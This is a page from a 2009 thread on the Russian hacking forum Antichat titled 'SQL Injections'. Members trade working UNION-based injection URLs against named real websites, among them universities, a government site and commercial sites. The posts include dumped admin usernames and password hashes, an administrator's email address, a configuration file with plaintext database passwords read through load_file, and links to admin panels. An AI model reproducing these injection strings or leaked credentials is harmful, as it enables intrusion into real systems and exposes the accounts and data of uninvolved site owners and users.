ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 966 из 1242 « Первая < 466866916956 962 963 964 965 966 967 968 969 970 97610161066 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9651  
Старый 04.06.2009, 09:26
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
PR 4
Код:
http://www.mdkiosk.com/subscription.php?ID=-1+union+select+concat_ws(0x3a,user(),database(),version())
mdkiosk@localhost:mdkiosk:5.0.27

.TV PR 3
Код:
http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17/*
tfboogaloo@logic:FamicomDojo:5.0.37-standard
Последний раз редактировалось mailbrush; 04.06.2009 в 09:33..
 
Ответить с цитированием

  #9652  
Старый 04.06.2009, 10:25
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
Цитата:
Сообщение от HAXTA4OK  
http://prgrh.ufpel.edu.br/index.php?id=1+union+select+1,2,3,4,concat_ws(0x3a ,user(),database(),version()),6,7,8--

_common@localhost:noticias:5.0.32-Debian_7etch8-log

куча таблов там ))) = wp_users

тока админку найти не смог ((((
###############################################
PR5

http://www.metodistademinas.edu.br/novo/cursos2v.php?id=-1+union+select+1,concat_Ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27--

metodistademin@hm1505.locaweb.com.br:metodistademi n:5.1.30-community

Цитата:
tbcontatos,tbusuarios,qub3_relations_rel,tboutras, tbnews,tbcursos,tbvar,qub3_settings_set,tbouvidori a,tbnotcol,tbfxcur,tbacontece,tbper,tbnoticias,tbg aleria,tbcapa,tbrhgeral,qub3_queries_que,tbnotinf, tbinstitucional
 
Ответить с цитированием

  #9653  
Старый 04.06.2009, 10:59
-JC-
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312

Репутация: 50
Отправить сообщение для -JC- с помощью ICQ
По умолчанию
http://www.anosy.gov.mg/index.php?self=5&page=-2+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+jos_users+--+
Последний раз редактировалось jokester; 04.06.2009 в 11:28.. Причина: l-oko.ru БОЯН
 
Ответить с цитированием

  #9654  
Старый 04.06.2009, 12:15
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
http://www.pragmaticus.ru/news.php?id=-320+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6
5.0.67ragma@10.0.0.3ragmatic


ТИЦ 80, PR 3
 
Ответить с цитированием

PR3
  #9655  
Старый 04.06.2009, 12:56
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию PR3
http://battlefieldsingleplayer.planetbattlefield.gamespy. com/index.php?pg=games_temp&g=1+AND+substring((version ()),1,1)=x


Version: 4.1.21-log
User : Dnamro_user@hweb7.in.gamespy.comG
Database : Dnam
 
Ответить с цитированием

  #9656  
Старый 04.06.2009, 12:58
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию
Цитата:
http://www.hificentre.com.ua/news_full.php?id=-1'+union+select+1,2,3,concat_ws(0x3a3a,id,user,pas s),5,6,7,8,9,10+from+userlist+--+
1::adminos::97154761
http://www.hificentre.com.ua/admin/
посмотрите сайт, я уже несколько раз видел такое. Я выложил сюда ИНДЖ и через 10 мин на сайте такое же написано было. Аналогично и с этим сайтом

там было типа "AYYILDIZ TEAM Ab1i HACKED" уже кто-то ачат влепил
Последний раз редактировалось udman; 04.06.2009 в 13:03..
 
Ответить с цитированием

  #9657  
Старый 04.06.2009, 13:06
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
http://www.icabc-pd.com/pd-seminars-seminar.php?id=-915+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat_ws(0x3a,version(),user(),database()),17
4.1.20dperson@localhost:dbpd

PR4

----------------
http://hbdinc.org/seminar.php?c=-1004+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6
5.0.75:hbdinc@205.178.145.65:hbdinc

PR 5

---------------
http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),user(),database()),7,8,9,10,11,12,13,14
5.0.45:aphex@localhost:web1

Таблицы:
TA_users (user,pwd)
http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws(0x3a,user,pwd ),7,8,9,10,11,12,13,14+from+TA_users

dvargas:302697aaf74426092f91730fb2d6ccd3
311admin:ce4fb0b63857dfa71184f137f0c102e5
jbach:9293d02937dd21a4595d650aa52a4cb4


eecenewsusers (user,pwd)

http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws
(0x3a,user,pwd),7,8,9,10,11,12,13,14+from+eecenews users+limit+0,1

jean:0421008445828ceb46f496700a5fa65e
webmaster:d2718c3f00a7aed3c6a0c12c31dac3fe


seminarusers (user,pwd)
http://socorro.ece.unm.edu/event/seminar.php?id=-192+union+select+1,2,3,4,5,concat_ws
(0x3a,user,pwd),7,8,9,10,11,12,13,14+fro+seminarus ers+limit+0,1

chaouki:47c4af02a9fba4a578f041e3277be116
faculty:bb8ebde87e5ea6724df5ab428f20b8c4
graduate:939ceb2be77a7fe133cdea4aef65c921
aphex:a18c70c5e2f22ca9cd7d389c8e436a92
locutus627:9174e8961e5e69e81c9fd9dbd44b0e5b
webmaster:204520204334e36e
jean:0421008445828ceb46f496700a5fa65e


wp_users (ID,user_login,user_pass,user_nicename,user_email, user_url,user_registered,user_activation_key,user_ status,display_name)

1:admin:$P$BK8i8ZTFXTDciGPGomG1mxoEKPdaVf0:admin:s darabi@gmail.com::2009-05-28 04:08:03::0:admin
 
Ответить с цитированием

  #9658  
Старый 04.06.2009, 13:18
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase%20%20%20()),3,4,5,6,7,8,9
5.0.51a-community-log:dennisvink_bas@217.170.14.130:dennisvink_denni s

Таблица admin (id,user,pass)
http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+17,1

Вытаскиваем:
http://www.dennisvinkonline.nl/seminar.php?id=-5+union+select+1,concat_ws(0x3a,id,user,pass),3,4, 5,6,7,8,9+from+admin+limit+0,1

2:dennis:bf2eb761d40672c33dbf02da9ab62837

Админка: http://www.dennisvinkonline.nl/admin/
 
Ответить с цитированием

  #9659  
Старый 04.06.2009, 13:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
gamebrix.com

Код:
http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
Код:
db@fs1@C34728-112966:tomcatusersnet:5.0.45-community-nt
Код:
http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1'
Цитата:
User Error: Database error: _doQuery: [Error message: Could not execute statement] [Last executed query: select a.*,b.* from product as a,accessprivileges as b where b.PID=a.PID and a.PID=-1\'] [Native code: 1064] [Native message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1] occured in C:\Nabrana\phpserver\www\config\globalconfig.php on 10 at Thu Jun 4 4:36:50 CDT 2009 Handled
Код:
http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,load_file(0x433A5C4E616272616E615C7068707365727665725C7777775C636F6E6669675C636F6E6669672E706870),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
Код:
define('DB_HOST','C34728-112966');   //  database host name
define('DB_NAME','tomcatusersnet');     //  database name 
define('DB_USER','db@fs1');        //  database username   
define('DB_PASSWORD','digital');

define('FORUM_DB_HOST','C34728-112966');   //  database host name
define('FORUM_DB_NAME','forumnet');     //  database name 
define('FORUM_DB_USER','db@fs1');        //  database username   
define('FORUM_DB_PASSWORD','digital');
Код:
http://www.gamebrix.com/subscription.php?page=subscriptiondetail&id=-1+union+select+1,concat_ws(0x3a,username,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+forum.phpbb_users+limit+1,1
Код:
gbrixadmin:020ed5f83af5275d6ad6b15bbd247576
 
Ответить с цитированием

  #9660  
Старый 04.06.2009, 13:56
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию
http://www.swan.ac.uk/compsci/research/seminars/seminar.php?seminar=-422+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ve rsion(),user(),database()),10,11,12
5.0.26:seminaruser@www.swan.ac.uk:seminar

PR 7



http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),user(),database())
4.1.22:goldbiouser@localhost:GoldBio
 
Ответить с цитированием
Ответ
Страница 966 из 1242 « Первая < 466866916956 962 963 964 965 966 967 968 969 970 97610161066 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ